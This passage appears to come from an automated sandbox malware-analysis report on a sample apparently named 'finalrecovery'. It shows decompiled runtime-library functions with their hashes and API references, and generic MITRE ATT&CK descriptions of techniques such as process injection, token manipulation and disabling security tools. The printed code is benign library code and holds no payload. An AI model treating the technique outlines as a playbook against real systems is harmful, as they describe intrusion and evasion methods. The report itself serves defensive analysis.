									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00412012(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00419BC9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x0041243c
0x0041243c
0x00412443
0x0041244c
0x0041256b
0x00412452
0x00412454
0x0041245e
0x00412461
0x00412467
0x00412471
0x00412496
0x0041249b
0x004124a0
0x00412567
0x00000000
0x00412568
0x004124a0
0x00412471
0x004124a6
0x004124a9
0x004124ac
0x004124b2
0x004124b8
0x004124ca
0x004124cf
0x004124d2
0x004124d5
0x004124d8
0x004124db
0x004124e1
0x004124e7
0x004124ea
0x004124ed
0x004124fc
0x004124fd
0x004124fd
0x00412502
0x00412515
0x00412517
0x0041251c
0x00412527
0x00412529
0x0041252b
0x00412547
0x0041254c
0x0041254f
0x0041254f
0x00412527
0x0041251c
0x00412555
0x00412556
0x00412559
0x0041255c
0x0041255f
0x00412562
0x004124ed
0x00000000
0x004124e1
0x0041256c
0x00412571
0x00412575
0x00412578
0x00412579
0x0041257a
0x0041257b
0x00412580
0x004125f8
0x004125fa
0x00412582
0x00412582
0x00412588
0x00000000
0x0041258a
0x0041258d
0x00412590
0x00412597
0x0041259a
0x0041259e
0x004125d0
0x004125d3
0x004125da
0x004125e0
0x004125ea
0x004125f3
0x004125f3
0x004125ea
0x004125e0
0x004125f4
0x004125a0
0x004125a0
0x004125a0
0x004125a3
0x004125a3
0x004125a7
0x00000000
0x00000000
0x004125ab
0x004125bf
0x004125bf
0x004125ad
0x004125ad
0x004125b3
0x00000000
0x004125b5
0x004125b5
0x004125b8
0x004125bd
0x00000000
0x00000000
0x00000000
0x00000000
0x004125bd
0x004125b3
0x004125c8
0x004125ca
0x00000000
0x004125cc
0x004125cc
0x004125cc
0x00000000
0x004125ca
0x004125c3
0x004125c5
0x00000000
0x004125c5
0x00000000
0x00000000
0x00000000
0x00412590
0x00412588
0x004125fb
0x004125ff
0x004125ff

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00412461

Strings

RCC, xrefs: 0041247B
MOC, xrefs: 00412473

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: d37859f17b73b2261ae4de6e8b7725f06e85962f159cea2480b8e6cc5e9693cb
Instruction ID: bb5014c6aab84a82a8e7b74ed228e9cfa815d3470b1d6d808257bd49c450617e
Opcode Fuzzy Hash: d37859f17b73b2261ae4de6e8b7725f06e85962f159cea2480b8e6cc5e9693cb
Instruction Fuzzy Hash: 03417D71900109AFCF16DF98CE81EEEBBB5FF48304F14806AF905A7251D3799AA1DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000447B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E1000447B(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E10003D8C(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E10003D8C(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E100033F6(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E10003329(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E10004051(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E100068B8(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x1000447b
0x1000447b
0x10004482
0x1000448b
0x100045aa
0x10004491
0x10004491
0x10004492
0x10004493
0x1000449d
0x100044a0
0x100044a6
0x100044b0
0x100044d5
0x100044da
0x100044df
0x100045a6
0x00000000
0x100045a7
0x100044df
0x100044b0
0x100044e5
0x100044e8
0x100044eb
0x100044f1
0x100044f7
0x10004509
0x1000450e
0x10004511
0x10004514
0x10004517
0x1000451a
0x10004520
0x10004526
0x10004529
0x1000452c
0x1000453b
0x1000453c
0x1000453c
0x10004541
0x10004554
0x10004556
0x1000455b
0x10004566
0x10004568
0x1000456a
0x10004586
0x1000458b
0x1000458e
0x1000458e
0x10004566
0x1000455b
0x10004594
0x10004595
0x10004598
0x1000459b
0x1000459e
0x100045a1
0x1000452c
0x00000000
0x10004520
0x100045ab
0x100045b0
0x100045b4
0x100045b7
0x100045b8
0x100045b9
0x100045ba
0x100045bf
0x10004637
0x10004639
0x100045c1
0x100045c1
0x100045c7
0x00000000
0x100045c9
0x100045cc
0x100045cf
0x100045d6
0x100045d9
0x100045dd
0x1000460f
0x10004612
0x10004619
0x1000461f
0x10004629
0x10004632
0x10004632
0x10004629
0x1000461f
0x10004633
0x100045df
0x100045df
0x100045df
0x100045e2
0x100045e2
0x100045e6
0x00000000
0x00000000
0x100045ea
0x100045fe
0x100045fe
0x100045ec
0x100045ec
0x100045f2
0x00000000
0x100045f4
0x100045f4
0x100045f7
0x100045fc
0x00000000
0x00000000
0x00000000
0x00000000
0x100045fc
0x100045f2
0x10004607
0x10004609
0x00000000
0x1000460b
0x1000460b
0x1000460b
0x00000000
0x10004609
0x10004602
0x10004604
0x00000000
0x10004604
0x00000000
0x00000000
0x00000000
0x100045cf
0x100045c7
0x1000463a
0x1000463e
0x1000463e

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 100044A0

Strings

MOC, xrefs: 100044B2
RCC, xrefs: 100044BA

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b5ef215a2816fb75be8d794751c3b8aa5bcadaf7074610592d3d5c115b7c7d76
Instruction ID: cb0f82cb1ee102d8320b3a7f619d438e5f56ab82e09b9abaac010858dbe8e2e0
Opcode Fuzzy Hash: b5ef215a2816fb75be8d794751c3b8aa5bcadaf7074610592d3d5c115b7c7d76
Instruction Fuzzy Hash: EF418AB1900609EFEF02CF94CC81A9EBBB5FF48385F168159F9046721ADB35AA60CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00403F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00403F10(intOrPtr _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v48;
				void* __ecx;
				void* __ebp;
				signed int _t34;
				signed int _t42;
				void* _t52;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t74;
				void* _t75;

				_push(0xffffffff);
				_push(0x42c38f);
				_push( *[fs:0x0]);
				_push(_t61);
				_t34 =  *0x43d054; // 0x8e1b5714
				_push(_t34 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_t68 = _t61;
				_v20 = _t68;
				E0040E023(_t61, 0);
				_v8 = 0;
				 *((intOrPtr*)(_t68 + 4)) = 0;
				 *((char*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0xc)) = 0;
				 *((char*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((short*)(_t68 + 0x18)) = 0;
				 *((intOrPtr*)(_t68 + 0x1c)) = 0;
				 *((short*)(_t68 + 0x20)) = 0;
				 *((intOrPtr*)(_t68 + 0x24)) = 0;
				 *((char*)(_t68 + 0x28)) = 0;
				 *((intOrPtr*)(_t68 + 0x2c)) = 0;
				 *((char*)(_t68 + 0x30)) = 0;
				_t39 = _a4;
				_v8 = 6;
				if(_a4 == 0) {
					E0040DFD6("bad locale name");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0xffffffff);
					_push(0x42c3b0);
					_push( *[fs:0x0]);
					_push(_t68);
					_t42 =  *0x43d054; // 0x8e1b5714
					_push(_t42 ^ _t74);
					 *[fs:0x0] =  &_v48;
					_t69 = _t61;
					E0040E351(_t61, _t69);
					_t46 =  *((intOrPtr*)(_t69 + 0x2c));
					_t75 = _t74 + 4;
					if( *((intOrPtr*)(_t69 + 0x2c)) != 0) {
						E00415EF8(_t46);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x2c)) = 0;
					_t47 =  *((intOrPtr*)(_t69 + 0x24));
					if( *((intOrPtr*)(_t69 + 0x24)) != 0) {
						E00415EF8(_t47);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x24)) = 0;
					_t48 =  *((intOrPtr*)(_t69 + 0x1c));
					if( *((intOrPtr*)(_t69 + 0x1c)) != 0) {
						E00415EF8(_t48);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					_t49 =  *((intOrPtr*)(_t69 + 0x14));
					if( *((intOrPtr*)(_t69 + 0x14)) != 0) {
						E00415EF8(_t49);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x14)) = 0;
					_t50 =  *((intOrPtr*)(_t69 + 0xc));
					if( *((intOrPtr*)(_t69 + 0xc)) != 0) {
						E00415EF8(_t50);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0xc)) = 0;
					_t51 =  *((intOrPtr*)(_t69 + 4));
					if( *((intOrPtr*)(_t69 + 4)) != 0) {
						E00415EF8(_t51);
					}
					 *((intOrPtr*)(_t69 + 4)) = 0;
					_t52 = E0040E07B(_t69);
					 *[fs:0x0] = _v20;
					return _t52;
				} else {
					E0040E306(_t61, _t68, _t39);
					 *[fs:0x0] = _v16;
					return _t68;
				}
			}

0x00403f13
0x00403f15
0x00403f20
0x00403f21
0x00403f23
0x00403f2a
0x00403f2e
0x00403f34
0x00403f36
0x00403f3b
0x00403f40
0x00403f47
0x00403f4e
0x00403f52
0x00403f59
0x00403f5f
0x00403f66
0x00403f6a
0x00403f6d
0x00403f71
0x00403f74
0x00403f77
0x00403f7a
0x00403f7d
0x00403f80
0x00403f86
0x00403fab
0x00403fb0
0x00403fb1
0x00403fb2
0x00403fb3
0x00403fb4
0x00403fb5
0x00403fb6
0x00403fb7
0x00403fb8
0x00403fb9
0x00403fba
0x00403fbb
0x00403fbc
0x00403fbd
0x00403fbe
0x00403fbf
0x00403fc3
0x00403fc5
0x00403fd0
0x00403fd1
0x00403fd2
0x00403fd9
0x00403fdd
0x00403fe3
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x00403ff6
0x00403ffb
0x00403ffb
0x00403ffe
0x00404005
0x0040400a
0x0040400d
0x00404012
0x00404012
0x00404015
0x0040401c
0x00404021
0x00404024
0x00404029
0x00404029
0x0040402c
0x00404033
0x00404038
0x0040403b
0x00404040
0x00404040
0x00404043
0x0040404a
0x0040404f
0x00404052
0x00404057
0x00404057
0x0040405a
0x00404061
0x00404066
0x00404069
0x0040406e
0x00404073
0x0040407a
0x00404082
0x0040408e
0x00403f88
0x00403f8a
0x00403f97
0x00403fa3
0x00403fa3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403F3B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403F8A

Part of subcall function 0040E306: _Yarn.LIBCPMT ref: 0040E325
Part of subcall function 0040E306: _Yarn.LIBCPMT ref: 0040E349

Strings

bad locale name, xrefs: 00403FA6

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 15047d3cab3a388f747ec954ab582be22dbdc6aaa037a05627440b292bcde390
Instruction ID: e6b9389b2c08e2ef135e9b23a3149de409d0f8b0078f9c25d55f73f6ca183cce
Opcode Fuzzy Hash: 15047d3cab3a388f747ec954ab582be22dbdc6aaa037a05627440b292bcde390
Instruction Fuzzy Hash: 9A119171904B849FD320CF69C801747BBF4EB19714F008A2EE84AD3B81D7B9A504CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041FFAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FFAB(void* _a4, char _a8) {
				void* _t4;
				void* _t13;
				long _t15;

				_t13 = _a4;
				if(_t13 != 0) {
					_t3 =  &_a8; // 0x450d61
					_t15 =  *_t3;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(__eflags <= 0) {
							while(1) {
								_t4 = HeapReAlloc( *0x450ce0, 0, _t13, _t15);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E0041C651();
								if(__eflags == 0) {
									goto L5;
								}
								__eflags = E0041A08C(__eflags, _t15);
								if(__eflags == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00413571(__eflags))) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E0041E238(_t13);
					goto L6;
				}
				_t2 =  &_a8; // 0x450d61
				return E0041ECAF( *_t2);
			}

0x0041ffb1
0x0041ffb6
0x0041ffc4
0x0041ffc4
0x0041ffc7
0x0041ffc9
0x0041ffd4
0x0041ffd7
0x0041fffe
0x00420008
0x0042000e
0x00420010
0x00000000
0x00000000
0x0041ffef
0x0041fff1
0x00000000
0x00000000
0x0041fffa
0x0041fffc
0x00000000
0x00000000
0x0041fffc
0x0041ffe6
0x00000000
0x0041ffe6
0x0041ffd9
0x0041ffde
0x0041ffe4
0x0041ffe4
0x0041ffe4
0x00000000
0x0041ffe4
0x0041ffcc
0x00000000
0x0041ffd1
0x0041ffb8
0x00000000

APIs

_free.LIBCMT ref: 0041FFCC

Part of subcall function 0041ECAF: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF1B,?,?,?,?,?,00403757,?,?,?), ref: 0041ECE1

HeapReAlloc.KERNEL32(00000000,?,aE,00000004,00000000,?,00424F45,?,00000004,00000000,00000001,?,?,0041A951,00000001,00000000), ref: 00420008

Strings

aE, xrefs: 0041FFC4, 0041FFB8, 0041FFF3, 0041FFFE

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Heap$AllocAllocate_free
String ID: aE
API String ID: 2447670028-88912727
Opcode ID: 539fec9d95538e17a96f0b4ae061adb5a37bed14c9de00bd151d05c67d12c0e3
Instruction ID: fc3a1acb1b5d13a89390b8b8f549daffd1b152a2490f76070813897bb1f9899a
Opcode Fuzzy Hash: 539fec9d95538e17a96f0b4ae061adb5a37bed14c9de00bd151d05c67d12c0e3
Instruction Fuzzy Hash: 3DF0F636205115A68B312A279C00EEB37199FD3BB4F22013BF81596291DEBCC8C785AE

Uniqueness

Uniqueness Score: -1.00%

Function 004243F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004243F9(void* __eflags, int _a4) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				int _t10;
				void* _t14;

				_t1 =  &_v20; // 0x42466a
				E004135A1(_t1, _t14, 0);
				 *0x450cc0 =  *0x450cc0 & 0x00000000;
				_t10 = _a4;
				if(_t10 != 0xfffffffe) {
					if(_t10 != 0xfffffffd) {
						if(_t10 == 0xfffffffc) {
							 *0x450cc0 = 1;
							_t10 =  *(_v16 + 8);
						}
					} else {
						 *0x450cc0 = 1;
						_t10 = GetACP();
					}
				} else {
					 *0x450cc0 = 1;
					_t10 = GetOEMCP();
				}
				if(_v8 == 0) {
					return _t10;
				} else {
					_t6 =  &_v20; // 0x42466a
					 *( *_t6 + 0x350) =  *( *_t6 + 0x350) & 0xfffffffd;
					return _t10;
				}
			}

0x00424401
0x00424406
0x0042440b
0x00424412
0x00424418
0x0042442f
0x00424446
0x0042444b
0x00424455
0x00424455
0x00424431
0x00424431
0x0042443b
0x0042443b
0x0042441a
0x0042441a
0x00424424
0x00424424
0x0042445c
0x00424469
0x0042445e
0x0042445e
0x00424461
0x00000000
0x00424461

APIs

GetOEMCP.KERNEL32(00000000,0042466A,00000000,00418114,?,?,00418114,?,00000000), ref: 00424424
GetACP.KERNEL32(00000000,0042466A,00000000,00418114,?,?,00418114,?,00000000), ref: 0042443B

Strings

jFB, xrefs: 00424401, 0042445E

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID: jFB
API String ID: 0-2230345691
Opcode ID: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
Instruction ID: b0cbe97a3a297516b13a94136188ad5a036869027f8c6976d93b98f7daab7f63
Opcode Fuzzy Hash: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
Instruction Fuzzy Hash: 4AF096306002149BDB15EB64F8487AD7770FB9133AFA00755E035872E2CBB59945CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00403D90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00403D90(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _t16;
				intOrPtr _t18;

				_t18 = _a4;
				asm("xorps xmm0, xmm0");
				_t16 = __ecx;
				 *__ecx = 0x42e2d4;
				asm("movq [eax], xmm0");
				E0040FEF1(_t18 + 4, __ecx + 4);
				 *_t16 = 0x439c9c;
				 *((intOrPtr*)(_t16 + 0xc)) =  *((intOrPtr*)(_t18 + 0xc));
				 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t18 + 0x10));
				 *_t16 = 0x439d08;
				return _t16;
			}

0x00403d94
0x00403d97
0x00403d9b
0x00403da1
0x00403da7
0x00403daf
0x00403db4
0x00403dc3
0x00403dc8
0x00403dcb
0x00403dd4

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403DAF

Strings

`=@, xrefs: 00403DB4
`=@, xrefs: 00403DCB

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: `=@$`=@
API String ID: 2659868963-2373854662
Opcode ID: 1835fe25a9934417243cb9c6f582fe7e11a76f86523e3a81444904ea1aba1888
Instruction ID: 05f9ae4e7c976d1bafa1cd320e8fd0d4b1db56fbaf48c0290a4ace6a9f75f361
Opcode Fuzzy Hash: 1835fe25a9934417243cb9c6f582fe7e11a76f86523e3a81444904ea1aba1888
Instruction Fuzzy Hash: 53F01CB6A10709ABC700CF59D400882F7ECFF59310310C62BE519D7B00E7B4B8548BA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
